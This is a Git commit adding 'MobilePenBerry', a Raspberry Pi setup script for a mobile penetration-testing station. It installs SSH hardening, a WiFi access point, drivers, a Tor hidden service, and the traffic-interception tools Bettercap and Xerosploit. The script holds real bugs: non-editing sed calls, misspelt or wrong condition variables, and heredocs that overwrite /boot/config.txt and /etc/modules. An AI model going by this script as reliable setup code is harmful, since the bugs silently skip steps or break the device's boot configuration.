wieerwill/MobilePenBerry
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Merry Christmas

Browse Source
This commit is contained in:
Robert Jeutter 2021-12-27 12:39:28 +01:00
commit 9db200cfc6
33 changed files with 3534 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
.gitignore vendored Normal file
View File

@ -0,0 +1 @@
*/*.pdf

BIN
Assets/X735.jpg Executable file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 33 KiB

293
Assets/install.sh Normal file
View File

@ -0,0 +1,293 @@
#!/bin/bash
############################################################
## MobilePenBerry
##
## Create your mobile penetration testing station
## on a RaspberryPi
## Tested on RaspberryPi 4
##
## run script as root
##
## author: github.com/wieerwill
##
############################################################
read -p "new user name: " USERNAME
read -sp "new user password: " PASSWORD
echo Updating
apt update
apt full-upgrade
apt install rpi-eeprom git build-essential dkms raspberrypi-kernel-headers -y
apt autoremove
rfkill unblock 0
rfkill unblock 1
echo create new user and disable default pi user
adduser $USERNAME
adduser $USERNAME sudo
usermod -a -G adm,dialout,cdrom,sudo,audio,video,plugdev,games,users,input,netdev,gpio,i2c,spi $USERNAME
usermod -L pi
passwd -l pi
echo setting locale to de_DE
sed 's/# de_DE.UTF-8 UTF-8/de_DE.UTF-8 UTF-8/' /etc/locale.gen
locale-gen de_DE.UTF-8
update-locale de_DE.UTF-8
echo SSH keys
rm -rf /home/pi/.ssh
rm -rf /home/$USERNAME/.ssh
ssh-keygen -R raspberrypi
ssh-keygen -t ecdsa -b 521
read -p "Disable SSH password login? (only do if exchanged ssh keys) [yes|no] " SSHPASS
if [ $SSHPASS == 'yes' ];
then
sed 's/# ChallengeResponseAuthentication yes/ChallengeResponseAuthentication no/' /etc/ssh/sshd_config
sed 's/# PasswordAuthentication yes/PasswordAuthentication no/' /etc/ssh/sshd_config
sed 's/# UsePAM yes/UsePAM no/' /etc/ssh/sshd_config
sed 's/#PermitRootLogin prohibit-password/PermitRootLogin prohibit-password/' /etc/ssh/sshd_config
service ssh restart
fi
read -p "Install Fail2ban? [yes|no] " FAIL2BAN
if [ $FAIL2BAN == 'yes' ];
then
apt install fail2ban -y
cat > /etc/fail2ban/jail.local << EOF
[ssh]
enabled = true
port = ssh
filter = sshd
logpath = /var/log/auth.log
maxretry = 6
EOF
service fail2ban restart
fi
read -p "Create WiFi AP? [yes|no] " WIFIAP
if [ $WIFIAP == 'yes' ];
then
read -p "What should be the name of the AP? " NETWORKNAME
read -p "What is the password of the AP? " NETWORKPASSWORD
apt-get install hostapd dnsmasq
systemctl stop hostapd
systemctl stop dnsmasq
echo "interface wlan0" >> /etc/dhcpcd.conf
echo "static ip_address=192.168.0.10/24" >> /etc/dhcpcd.conf
echo "denyinterfaces eth0" >> /etc/dhcpcd.conf
echo "denyinterfaces wlan0" >> /etc/dhcpcd.conf
mv /etc/dnsmasq.conf /etc/dnsmasq.conf.orig
cat > /etc/dnsmasq.conf << EOF
interface=wlan0
dhcp-range=192.168.0.11,192.168.0.30,255.255.255.0,24h
EOF
cat > /etc/hostapd/hostapd.conf << EOF
interface=wlan0
bridge=br0
hw_mode=g
channel=7
wmm_enabled=0
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP
EOF
echo "ssid=$NETWORKNAME" >> /etc/hostapd/hostapd.conf
echo "wpa_passphrase=$NETWORKPASSWORD" >> /etc/hostapd/hostapd.conf
sed 's/#DEAMON_CONF=/DAEMON_CONF="/etc/hostapd/hostapd.conf/' /etc/default/hostapd
else
echo "WIFI AP will not be configured"
fi
read -p "Install RTL88X2BU WiFi Driver? [yes|no] " RTLBU
if [ $RTLBU == 'yes' ]; then
cd
git clone https://github.com/cilynx/rtl88x2bu
cd rtl88x2bu/
sed -i 's/I386_PC = y/I386_PC = n/' Makefile
sed -i 's/ARM_RPI = n/ARM_RPI = y/' Makefile
VER=$(sed -n 's/\PACKAGE_VERSION="\(.*\)"/\1/p' dkms.conf)
rsync -rvhP ./ /usr/src/rtl88x2bu-${VER}
dkms add -m rtl88x2bu -v ${VER}
dkms build -m rtl88x2bu -v ${VER}
dkms install -m rtl88x2bu -v ${VER}
echo 8812bu | tee -a /etc/modules
cd
fi
read -p "Install RTL8812AU WiFi Driver? [yes|no] " RTLAU
if [ $RTLAU == 'yes' ]; then
cd
git clone https://github.com/gnab/rtl8812au.git
cd rtl8812au/
sed -i 's/I386_PC = y/I386_PC = n/' Makefile
sed -i 's/ARM_RPI = n/ARM_RPI = y/' Makefile
make dkms_install
echo 8812au | tee -a /etc/modules
cd
fi
read -p "Install GPS drivers? [yes|no]" GPS
if [ $RTLAU == 'yes' ]; then
apt install gpsd gpsd-clients python-gi-cairo minicom -y
#GPSDID = pidof gpsd
#kill $GPSDID
killall gpsd
systemctl stop gpsd.socket
systemctl disable gpsd.socket
killall gpsd
rm /var/run/gpsd.sock
gpsctl -f -n /dev/ttyUSB0
stty -F /dev/ttyACM0
stty -F /dev/ttyACM0 9600
mv /etc/default/gpsd /etc/default/gpsd_default
cat > /etc/default/gpsd << EOF
START_DAEMON="true"
USBAUTO="true"
DEVICES="/dev/ttyACM0"
GPSD_OPTIONS="-b -n -S 2900"
GPSD_SOCKET="/var/run/gpsd.sock"
service gpsd restart
EOF
fi
read -p "Install I2C SSD1306 Display? [yes|no]" SSD1306
if [ $SSD1306 == 'yes' ]; then
apt install -y git python3-dev python3-pil python3-smbus python3-pil python3-pip python3-setuptools python3-rpi.gpio python3-pip i2ctools libi2c-dev -y
cat > /etc/modules << EOF
i2c-dev
i2c-bcm2708
EOF
cat > /boot/config.txt << EOF
dtparam=i2c_arm=on
dtparam=i2c1=on
EOF
i2cdetect -y 1
cd
git clone https://github.com/adafruit/Adafruit_Python_SSD1306.git
cd Adafruit_Python_SSD1306
python3 setup.py install
cd
fi
read -p "Enable SPI? [yes|no]" SPI
if [ $SPI == 'yes' ]; then
cat > /boot/config.txt << EOF
dtparam=spi=on
EOF
# check if enabled
lsmod | grep spi_
fi
read -p "Install BCM2835 library? [yes|no]" BCM2835
if [ $BCM2835 == 'yes' ]; then
apt install wget -y
wget http://www.airspayce.com/mikem/bcm2835/bcm2835-1.71.tar.gz
tar zxvf bcm2835-1.71.tar.gz
rm -r bcm2835-1.71.tar.gz
cd bcm2835-1.71/
./configure
make
make check
make install
cd
fi
read -p "Install WiringPi library? [yes|no]" WIRINGPI
if [ $WIRINGPI == 'yes' ]; then
apt install wiringpi dpkg wget -y
wget https://project-downloads.drogon.net/wiringpi-latest.deb
dpkg -i wiringpi-latest.deb
rm wiringpi-latest.deb
fi
read -p "Install Python3 GPIO library? [yes|no]" PYTHONGPIO
if [ $PYTHONGPIO == 'yes' ]; then
apt install python3-pip python3-pil python3-numpy -y
pip3 install RPi.GPIO spidev
fi
read -p "Download Waveshare Codes? [yes|no]" WAVESHARE
if [ $WAVESHARE == 'yes' ]; then
git clone https://github.com/waveshare/e-Paper
fi
read -p "Install I2C Real Time Clock? [yes|no]" RTC
if [ $RTC == 'yes' ]; then
cat > /boot/config.txt << EOF
dtoverlay=i2c-rtc,ds1307
EOF
apt -y remove fake-hwclock
update-rc.d -f fake-hwclock remove
sed -i '/if [ -e /run/systemd/system ] ; then\
exit 0\
fi/#if [ -e /run/systemd/system ] ; then\
#exit 0\
#fi/g' /lib/udev/hwclock-set
fi
read -p "Install mkp224o to generate onion address? [yes|no]" MKP22O
if [ $MKP22O == 'yes' ]; then
apt install gcc libsodium-dev make autoconf git -y
cd
git clone https://github.com/cathugger/mkp224o
cd mkp224o
./autogen.sh
./configure
make
fi
read -p "Install TOR service? [yes|no]" TOR
if [ $TOR == 'yes' ]; then
apt install nginx tor -y
systemctl enable nginx
systemctl start nginx
systemctl enable tor
systemctl start tor
cat > /var/www/html/index.html << EOF
<!DOCTYPE html>
<html>
<head>
<title>Example</title>
</head>
<body>
<p>This is an example of a simple HTML page with one paragraph.</p>
</body>
</html>
EOF
systemctl restart nginx
sed -i 's+#HiddenServiceDir /var/lib/tor/hidden_service/ = y+HiddenServiceDir /var/lib/tor/hidden_service/+' /etc/tor/torrc
sed -i 's+#HiddenServicePort 80 127.0.0.1:80+HiddenServicePort 80 127.0.0.1:80+' /etc/tor/torrc
systemctl restart tor
fi
read -p "Install Bettercap? [yes|no]" BETTERCAP
if [ $BETERCAP == 'yes' ]; then
wget https://go.dev/dl/go1.17.5.linux-armv6l.tar.gz
rm -rf /usr/local/go
tar -C /usr/local -xzf go1.17.5.linux-armv6l.tar.gz
cat > ~/.profile << EOF
PATH=$PATH:/usr/local/go/bin
GOPATH=$HOME/golang
EOF
source ~/.profile
rm -r go1.17.5.linux-armv6l.tar.gz
apt install libpcap-dev libnetfilter-queue-dev libusb-1.0-0-dev build-essential
go install github.com/bettercap/bettercap@latest
cp go/bin/bettercap /usr/bin/
bettercap -eval "caplets.update; ui.update; quit"
fi
read -p "Install Xerosploit? [yes|no]" BETTERCAP
if [ $BETERCAP == 'yes' ]; then
cd
git clone https://github.com/LionSec/xerosploit
cd xerosploit
python install.py
fi

BIN
Assets/ssd1306.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 142 KiB

BIN
Assets/waveshare-2.13.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 100 KiB

72
Assets/x730-safeshutdown.sh Normal file
View File

@ -0,0 +1,72 @@
#x730 Powering on /reboot /shutdown from hardware
#!/bin/bash
sudo sed -e '/shutdown/ s/^#*/#/' -i /etc/rc.local
echo '#!/bin/bash
SHUTDOWN=4
REBOOTPULSEMINIMUM=200
REBOOTPULSEMAXIMUM=600
echo "$SHUTDOWN" > /sys/class/gpio/export
echo "in" > /sys/class/gpio/gpio$SHUTDOWN/direction
BOOT=17
echo "$BOOT" > /sys/class/gpio/export
echo "out" > /sys/class/gpio/gpio$BOOT/direction
echo "1" > /sys/class/gpio/gpio$BOOT/value
echo "X730 Shutting down..."
while [ 1 ]; do
shutdownSignal=$(cat /sys/class/gpio/gpio$SHUTDOWN/value)
if [ $shutdownSignal = 0 ]; then
/bin/sleep 0.2
else
pulseStart=$(date +%s%N | cut -b1-13)
while [ $shutdownSignal = 1 ]; do
/bin/sleep 0.02
if [ $(($(date +%s%N | cut -b1-13)-$pulseStart)) -gt $REBOOTPULSEMAXIMUM ]; then
echo "X730 Shutting down", SHUTDOWN, ", halting Rpi ..."
sudo poweroff
exit
fi
shutdownSignal=$(cat /sys/class/gpio/gpio$SHUTDOWN/value)
done
if [ $(($(date +%s%N | cut -b1-13)-$pulseStart)) -gt $REBOOTPULSEMINIMUM ]; then
echo "X730 Rebooting", SHUTDOWN, ", recycling Rpi ..."
sudo reboot
exit
fi
fi
done' > /etc/x730pwr.sh
sudo chmod +x /etc/x730pwr.sh
sudo sed -i '$ i /etc/x730pwr.sh &' /etc/rc.local
#X730 full shutdown through Software
#!/bin/bash
sudo sed -e '/button/ s/^#*/#/' -i /etc/rc.local
echo '#!/bin/bash
BUTTON=18
echo "$BUTTON" > /sys/class/gpio/export;
echo "out" > /sys/class/gpio/gpio$BUTTON/direction
echo "1" > /sys/class/gpio/gpio$BUTTON/value
SLEEP=${1:-4}
re='^[0-9\.]+$'
if ! [[ $SLEEP =~ $re ]] ; then
echo "error: sleep time not a number" >&2; exit 1
fi
echo "X730 Shutting down..."
/bin/sleep $SLEEP
#restore GPIO 18
echo "0" > /sys/class/gpio/gpio$BUTTON/value
' > /usr/local/bin/x730shutdown.sh
sudo chmod +x /usr/local/bin/x730shutdown.sh

674
LICENSE Normal file
View File

@ -0,0 +1,674 @@
GNU GENERAL PUBLIC LICENSE
Version 3, 29 June 2007
Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.
Preamble
The GNU General Public License is a free, copyleft license for
software and other kinds of works.
The licenses for most software and other practical works are designed
to take away your freedom to share and change the works. By contrast,
the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users. We, the Free Software Foundation, use the
GNU General Public License for most of our software; it applies also to
any other work released this way by its authors. You can apply it to
your programs, too.
When we speak of free software, we are referring to freedom, not
price. Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.
To protect your rights, we need to prevent others from denying you
these rights or asking you to surrender the rights. Therefore, you have
certain responsibilities if you distribute copies of the software, or if
you modify it: responsibilities to respect the freedom of others.
For example, if you distribute copies of such a program, whether
gratis or for a fee, you must pass on to the recipients the same
freedoms that you received. You must make sure that they, too, receive
or can get the source code. And you must show them these terms so they
know their rights.
Developers that use the GNU GPL protect your rights with two steps:
(1) assert copyright on the software, and (2) offer you this License
giving you legal permission to copy, distribute and/or modify it.
For the developers' and authors' protection, the GPL clearly explains
that there is no warranty for this free software. For both users' and
authors' sake, the GPL requires that modified versions be marked as
changed, so that their problems will not be attributed erroneously to
authors of previous versions.
Some devices are designed to deny users access to install or run
modified versions of the software inside them, although the manufacturer
can do so. This is fundamentally incompatible with the aim of
protecting users' freedom to change the software. The systematic
pattern of such abuse occurs in the area of products for individuals to
use, which is precisely where it is most unacceptable. Therefore, we
have designed this version of the GPL to prohibit the practice for those
products. If such problems arise substantially in other domains, we
stand ready to extend this provision to those domains in future versions
of the GPL, as needed to protect the freedom of users.
Finally, every program is threatened constantly by software patents.
States should not allow patents to restrict development and use of
software on general-purpose computers, but in those that do, we wish to
avoid the special danger that patents applied to a free program could
make it effectively proprietary. To prevent this, the GPL assures that
patents cannot be used to render the program non-free.
The precise terms and conditions for copying, distribution and
modification follow.
TERMS AND CONDITIONS
0. Definitions.
"This License" refers to version 3 of the GNU General Public License.
"Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.
"The Program" refers to any copyrightable work licensed under this
License. Each licensee is addressed as "you". "Licensees" and
"recipients" may be individuals or organizations.
To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy. The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.
A "covered work" means either the unmodified Program or a work based
on the Program.
To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy. Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.
To "convey" a work means any kind of propagation that enables other
parties to make or receive copies. Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.
An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License. If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.
1. Source Code.
The "source code" for a work means the preferred form of the work
for making modifications to it. "Object code" means any non-source
form of a work.
A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.
The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
implementation is available to the public in source code form. A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.
The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities. However, it does not include the work's
System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not part of the work. For example, Corresponding Source
includes interface definition files associated with source files for
the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.
The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.
The Corresponding Source for a work in source code form is that
same work.
2. Basic Permissions.
All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met. This License explicitly affirms your unlimited
permission to run the unmodified Program. The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work. This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.
You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force. You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright. Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.
Conveying under any other circumstances is permitted solely under
the conditions stated below. Sublicensing is not allowed; section 10
makes it unnecessary.
3. Protecting Users' Legal Rights From Anti-Circumvention Law.
No covered work shall be deemed part of an effective technological
measure under any applicable law fulfilling obligations under article
11 of the WIPO copyright treaty adopted on 20 December 1996, or
similar laws prohibiting or restricting circumvention of such
measures.
When you convey a covered work, you waive any legal power to forbid
circumvention of technological measures to the extent such circumvention
is effected by exercising rights under this License with respect to
the covered work, and you disclaim any intention to limit operation or
modification of the work as a means of enforcing, against the work's
users, your or third parties' legal rights to forbid circumvention of
technological measures.
4. Conveying Verbatim Copies.
You may convey verbatim copies of the Program's source code as you
receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice;
keep intact all notices stating that this License and any
non-permissive terms added in accord with section 7 apply to the code;
keep intact all notices of the absence of any warranty; and give all
recipients a copy of this License along with the Program.
You may charge any price or no price for each copy that you convey,
and you may offer support or warranty protection for a fee.
5. Conveying Modified Source Versions.
You may convey a work based on the Program, or the modifications to
produce it from the Program, in the form of source code under the
terms of section 4, provided that you also meet all of these conditions:
a) The work must carry prominent notices stating that you modified
it, and giving a relevant date.
b) The work must carry prominent notices stating that it is
released under this License and any conditions added under section
7. This requirement modifies the requirement in section 4 to
"keep intact all notices".
c) You must license the entire work, as a whole, under this
License to anyone who comes into possession of a copy. This
License will therefore apply, along with any applicable section 7
additional terms, to the whole of the work, and all its parts,
regardless of how they are packaged. This License gives no
permission to license the work in any other way, but it does not
invalidate such permission if you have separately received it.
d) If the work has interactive user interfaces, each must display
Appropriate Legal Notices; however, if the Program has interactive
interfaces that do not display Appropriate Legal Notices, your
work need not make them do so.
A compilation of a covered work with other separate and independent
works, which are not by their nature extensions of the covered work,
and which are not combined with it such as to form a larger program,
in or on a volume of a storage or distribution medium, is called an
"aggregate" if the compilation and its resulting copyright are not
used to limit the access or legal rights of the compilation's users
beyond what the individual works permit. Inclusion of a covered work
in an aggregate does not cause this License to apply to the other
parts of the aggregate.
6. Conveying Non-Source Forms.
You may convey a covered work in object code form under the terms
of sections 4 and 5, provided that you also convey the
machine-readable Corresponding Source under the terms of this License,
in one of these ways:
a) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by the
Corresponding Source fixed on a durable physical medium
customarily used for software interchange.
b) Convey the object code in, or embodied in, a physical product
(including a physical distribution medium), accompanied by a
written offer, valid for at least three years and valid for as
long as you offer spare parts or customer support for that product
model, to give anyone who possesses the object code either (1) a
copy of the Corresponding Source for all the software in the
product that is covered by this License, on a durable physical
medium customarily used for software interchange, for a price no
more than your reasonable cost of physically performing this
conveying of source, or (2) access to copy the
Corresponding Source from a network server at no charge.
c) Convey individual copies of the object code with a copy of the
written offer to provide the Corresponding Source. This
alternative is allowed only occasionally and noncommercially, and
only if you received the object code with such an offer, in accord
with subsection 6b.
d) Convey the object code by offering access from a designated
place (gratis or for a charge), and offer equivalent access to the
Corresponding Source in the same way through the same place at no
further charge. You need not require recipients to copy the
Corresponding Source along with the object code. If the place to
copy the object code is a network server, the Corresponding Source
may be on a different server (operated by you or a third party)
that supports equivalent copying facilities, provided you maintain
clear directions next to the object code saying where to find the
Corresponding Source. Regardless of what server hosts the
Corresponding Source, you remain obligated to ensure that it is
available for as long as needed to satisfy these requirements.
e) Convey the object code using peer-to-peer transmission, provided
you inform other peers where the object code and Corresponding
Source of the work are being offered to the general public at no
charge under subsection 6d.
A separable portion of the object code, whose source code is excluded
from the Corresponding Source as a System Library, need not be
included in conveying the object code work.
A "User Product" is either (1) a "consumer product", which means any
tangible personal property which is normally used for personal, family,
or household purposes, or (2) anything designed or sold for incorporation
into a dwelling. In determining whether a product is a consumer product,
doubtful cases shall be resolved in favor of coverage. For a particular
product received by a particular user, "normally used" refers to a
typical or common use of that class of product, regardless of the status
of the particular user or of the way in which the particular user
actually uses, or expects or is expected to use, the product. A product
is a consumer product regardless of whether the product has substantial
commercial, industrial or non-consumer uses, unless such uses represent
the only significant mode of use of the product.
"Installation Information" for a User Product means any methods,
procedures, authorization keys, or other information required to install
and execute modified versions of a covered work in that User Product from
a modified version of its Corresponding Source. The information must
suffice to ensure that the continued functioning of the modified object
code is in no case prevented or interfered with solely because
modification has been made.
If you convey an object code work under this section in, or with, or
specifically for use in, a User Product, and the conveying occurs as
part of a transaction in which the right of possession and use of the
User Product is transferred to the recipient in perpetuity or for a
fixed term (regardless of how the transaction is characterized), the
Corresponding Source conveyed under this section must be accompanied
by the Installation Information. But this requirement does not apply
if neither you nor any third party retains the ability to install
modified object code on the User Product (for example, the work has
been installed in ROM).
The requirement to provide Installation Information does not include a
requirement to continue to provide support service, warranty, or updates
for a work that has been modified or installed by the recipient, or for
the User Product in which it has been modified or installed. Access to a
network may be denied when the modification itself materially and
adversely affects the operation of the network or violates the rules and
protocols for communication across the network.
Corresponding Source conveyed, and Installation Information provided,
in accord with this section must be in a format that is publicly
documented (and with an implementation available to the public in
source code form), and must require no special password or key for
unpacking, reading or copying.
7. Additional Terms.
"Additional permissions" are terms that supplement the terms of this
License by making exceptions from one or more of its conditions.
Additional permissions that are applicable to the entire Program shall
be treated as though they were included in this License, to the extent
that they are valid under applicable law. If additional permissions
apply only to part of the Program, that part may be used separately
under those permissions, but the entire Program remains governed by
this License without regard to the additional permissions.
When you convey a copy of a covered work, you may at your option
remove any additional permissions from that copy, or from any part of
it. (Additional permissions may be written to require their own
removal in certain cases when you modify the work.) You may place
additional permissions on material, added by you to a covered work,
for which you have or can give appropriate copyright permission.
Notwithstanding any other provision of this License, for material you
add to a covered work, you may (if authorized by the copyright holders of
that material) supplement the terms of this License with terms:
a) Disclaiming warranty or limiting liability differently from the
terms of sections 15 and 16 of this License; or
b) Requiring preservation of specified reasonable legal notices or
author attributions in that material or in the Appropriate Legal
Notices displayed by works containing it; or
c) Prohibiting misrepresentation of the origin of that material, or
requiring that modified versions of such material be marked in
reasonable ways as different from the original version; or
d) Limiting the use for publicity purposes of names of licensors or
authors of the material; or
e) Declining to grant rights under trademark law for use of some
trade names, trademarks, or service marks; or
f) Requiring indemnification of licensors and authors of that
material by anyone who conveys the material (or modified versions of
it) with contractual assumptions of liability to the recipient, for
any liability that these contractual assumptions directly impose on
those licensors and authors.
All other non-permissive additional terms are considered "further
restrictions" within the meaning of section 10. If the Program as you
received it, or any part of it, contains a notice stating that it is
governed by this License along with a term that is a further
restriction, you may remove that term. If a license document contains
a further restriction but permits relicensing or conveying under this
License, you may add to a covered work material governed by the terms
of that license document, provided that the further restriction does
not survive such relicensing or conveying.
If you add terms to a covered work in accord with this section, you
must place, in the relevant source files, a statement of the
additional terms that apply to those files, or a notice indicating
where to find the applicable terms.
Additional terms, permissive or non-permissive, may be stated in the
form of a separately written license, or stated as exceptions;
the above requirements apply either way.
8. Termination.
You may not propagate or modify a covered work except as expressly
provided under this License. Any attempt otherwise to propagate or
modify it is void, and will automatically terminate your rights under
this License (including any patent licenses granted under the third
paragraph of section 11).
However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly and
finally terminates your license, and (b) permanently, if the copyright
holder fails to notify you of the violation by some reasonable means
prior to 60 days after the cessation.
Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you have
received notice of violation of this License (for any work) from that
copyright holder, and you cure the violation prior to 30 days after
your receipt of the notice.
Termination of your rights under this section does not terminate the
licenses of parties who have received copies or rights from you under
this License. If your rights have been terminated and not permanently
reinstated, you do not qualify to receive new licenses for the same
material under section 10.
9. Acceptance Not Required for Having Copies.
You are not required to accept this License in order to receive or
run a copy of the Program. Ancillary propagation of a covered work
occurring solely as a consequence of using peer-to-peer transmission
to receive a copy likewise does not require acceptance. However,
nothing other than this License grants you permission to propagate or
modify any covered work. These actions infringe copyright if you do
not accept this License. Therefore, by modifying or propagating a
covered work, you indicate your acceptance of this License to do so.
10. Automatic Licensing of Downstream Recipients.
Each time you convey a covered work, the recipient automatically
receives a license from the original licensors, to run, modify and
propagate that work, subject to this License. You are not responsible
for enforcing compliance by third parties with this License.
An "entity transaction" is a transaction transferring control of an
organization, or substantially all assets of one, or subdividing an
organization, or merging organizations. If propagation of a covered
work results from an entity transaction, each party to that
transaction who receives a copy of the work also receives whatever
licenses to the work the party's predecessor in interest had or could
give under the previous paragraph, plus a right to possession of the
Corresponding Source of the work from the predecessor in interest, if
the predecessor has it or can get it with reasonable efforts.
You may not impose any further restrictions on the exercise of the
rights granted or affirmed under this License. For example, you may
not impose a license fee, royalty, or other charge for exercise of
rights granted under this License, and you may not initiate litigation
(including a cross-claim or counterclaim in a lawsuit) alleging that
any patent claim is infringed by making, using, selling, offering for
sale, or importing the Program or any portion of it.
11. Patents.
A "contributor" is a copyright holder who authorizes use under this
License of the Program or a work on which the Program is based. The
work thus licensed is called the contributor's "contributor version".
A contributor's "essential patent claims" are all patent claims
owned or controlled by the contributor, whether already acquired or
hereafter acquired, that would be infringed by some manner, permitted
by this License, of making, using, or selling its contributor version,
but do not include claims that would be infringed only as a
consequence of further modification of the contributor version. For
purposes of this definition, "control" includes the right to grant
patent sublicenses in a manner consistent with the requirements of
this License.
Each contributor grants you a non-exclusive, worldwide, royalty-free
patent license under the contributor's essential patent claims, to
make, use, sell, offer for sale, import and otherwise run, modify and
propagate the contents of its contributor version.
In the following three paragraphs, a "patent license" is any express
agreement or commitment, however denominated, not to enforce a patent
(such as an express permission to practice a patent or covenant not to
sue for patent infringement). To "grant" such a patent license to a
party means to make such an agreement or commitment not to enforce a
patent against the party.
If you convey a covered work, knowingly relying on a patent license,
and the Corresponding Source of the work is not available for anyone
to copy, free of charge and under the terms of this License, through a
publicly available network server or other readily accessible means,
then you must either (1) cause the Corresponding Source to be so
available, or (2) arrange to deprive yourself of the benefit of the
patent license for this particular work, or (3) arrange, in a manner
consistent with the requirements of this License, to extend the patent
license to downstream recipients. "Knowingly relying" means you have
actual knowledge that, but for the patent license, your conveying the
covered work in a country, or your recipient's use of the covered work
in a country, would infringe one or more identifiable patents in that
country that you have reason to believe are valid.
If, pursuant to or in connection with a single transaction or
arrangement, you convey, or propagate by procuring conveyance of, a
covered work, and grant a patent license to some of the parties
receiving the covered work authorizing them to use, propagate, modify
or convey a specific copy of the covered work, then the patent license
you grant is automatically extended to all recipients of the covered
work and works based on it.
A patent license is "discriminatory" if it does not include within
the scope of its coverage, prohibits the exercise of, or is
conditioned on the non-exercise of one or more of the rights that are
specifically granted under this License. You may not convey a covered
work if you are a party to an arrangement with a third party that is
in the business of distributing software, under which you make payment
to the third party based on the extent of your activity of conveying
the work, and under which the third party grants, to any of the
parties who would receive the covered work from you, a discriminatory
patent license (a) in connection with copies of the covered work
conveyed by you (or copies made from those copies), or (b) primarily
for and in connection with specific products or compilations that
contain the covered work, unless you entered into that arrangement,
or that patent license was granted, prior to 28 March 2007.
Nothing in this License shall be construed as excluding or limiting
any implied license or other defenses to infringement that may
otherwise be available to you under applicable patent law.
12. No Surrender of Others' Freedom.
If conditions are imposed on you (whether by court order, agreement or
otherwise) that contradict the conditions of this License, they do not
excuse you from the conditions of this License. If you cannot convey a
covered work so as to satisfy simultaneously your obligations under this
License and any other pertinent obligations, then as a consequence you may
not convey it at all. For example, if you agree to terms that obligate you
to collect a royalty for further conveying from those to whom you convey
the Program, the only way you could satisfy both those terms and this
License would be to refrain entirely from conveying the Program.
13. Use with the GNU Affero General Public License.
Notwithstanding any other provision of this License, you have
permission to link or combine any covered work with a work licensed
under version 3 of the GNU Affero General Public License into a single
combined work, and to convey the resulting work. The terms of this
License will continue to apply to the part which is the covered work,
but the special requirements of the GNU Affero General Public License,
section 13, concerning interaction through a network will apply to the
combination as such.
14. Revised Versions of this License.
The Free Software Foundation may publish revised and/or new versions of
the GNU General Public License from time to time. Such new versions will
be similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the
Program specifies that a certain numbered version of the GNU General
Public License "or any later version" applies to it, you have the
option of following the terms and conditions either of that numbered
version or of any later version published by the Free Software
Foundation. If the Program does not specify a version number of the
GNU General Public License, you may choose any version ever published
by the Free Software Foundation.
If the Program specifies that a proxy can decide which future
versions of the GNU General Public License can be used, that proxy's
public statement of acceptance of a version permanently authorizes you
to choose that version for the Program.
Later license versions may give you additional or different
permissions. However, no additional obligations are imposed on any
author or copyright holder as a result of your choosing to follow a
later version.
15. Disclaimer of Warranty.
THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
